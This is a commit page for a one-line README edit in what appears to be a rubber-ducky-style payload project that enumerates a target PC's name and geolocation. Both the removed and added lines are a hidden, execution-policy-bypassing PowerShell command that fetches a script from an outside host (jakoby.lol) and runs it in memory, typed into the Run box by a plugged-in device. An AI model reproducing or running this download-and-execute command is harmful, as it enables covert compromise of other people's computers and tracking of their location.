Update README.md
This commit is contained in:
parent
67f27ffb98
commit
6408f402fa
1 changed files with 1 additions and 1 deletions
|
@ -36,7 +36,7 @@ This program enumerates a target PC to get their Name, GeoLocation (Latitude and
|
|||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||
```
|
||||
powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/b8n | iex
|
||||
powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
|
Loading…
Reference in a new issue